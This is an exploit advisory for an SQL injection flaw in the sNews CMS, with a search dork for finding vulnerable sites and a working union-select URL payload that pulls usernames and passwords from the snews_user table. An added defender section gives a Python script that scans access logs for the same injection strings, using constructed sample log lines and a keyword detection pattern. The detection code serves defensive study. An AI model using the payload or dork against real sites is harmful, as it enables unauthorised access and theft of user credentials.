Title: CMS snews SQL Injection Vulnerability
Author: onestree
Download: http://snewscms.com/
Tested on: ubuntu 12.10 / win 7
Keyword: inurl:"tanyakan pada rumput yang bergoyang"

*************************************************************

SQL poc:

http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]

Example:

http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
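
For defenders: the PoC above relies on the `id` parameter of `act=shownews` carrying something other than an integer. The following is an added example, not part of the original advisory or of sNews itself. It scans web-server access logs for such requests using a strict integer allowlist, the same rule the application should enforce before building its query. The log lines are constructed samples and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2013:10:00:00 +0000] "GET /snews/snews.php?act=shownews&id=23 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2013:10:00:05 +0000] "GET /snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,2/**/from/**/snews_user HTTP/1.1" 200 4873',
    '192.0.2.44 - - [01/Jan/2013:10:00:09 +0000] "GET /snews/snews.php?act=shownews&id=5%20UnIoN%20SeLeCt%201 HTTP/1.1" 200 4873',
    '198.51.100.7 - - [01/Jan/2013:10:00:11 +0000] "GET /snews/snews.php?act=shownews&id=7%27 HTTP/1.1" 200 310',
    '192.0.2.10 - - [01/Jan/2013:10:00:12 +0000] "GET /snews/index.php?id=abc HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_COMMENT_RE = re.compile(r'/\*.*?\*/', re.S)
SQL_KEYWORD_RE = re.compile(r'\b(union|select|from|concat)\b', re.I)

def classify_id(value):
    """Return 'ok', 'non_numeric' or 'sqli_pattern' for one decoded id value."""
    # Allowlist: a news id is a plain non-negative integer and nothing else.
    if re.fullmatch(r'\d{1,10}', value):
        return 'ok'
    # Inline /**/ comments stand in for whitespace; turn them into spaces
    # so the normalized value reads as ordinary SQL before keyword matching.
    normalized = SQL_COMMENT_RE.sub(' ', value)
    if SQL_KEYWORD_RE.search(normalized):
        return 'sqli_pattern'
    return 'non_numeric'

def scan(lines):
    """Return (line number, client address, verdict) for suspicious requests."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith('/snews.php'):
            continue
        params = parse_qs(url.query, keep_blank_values=True)  # URL-decodes values
        if params.get('act') != ['shownews']:
            continue
        for value in params.get('id', ['']):
            verdict = classify_id(value)
            if verdict != 'ok':
                findings.append((lineno, line.split()[0], verdict))
    return findings

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The keyword match only grades severity; any request that fails the integer allowlist is worth reviewing on its own.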

Thanks:

Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell

indonesiancoder - moeslimh4x0r - go-coder

spesial my hunny :*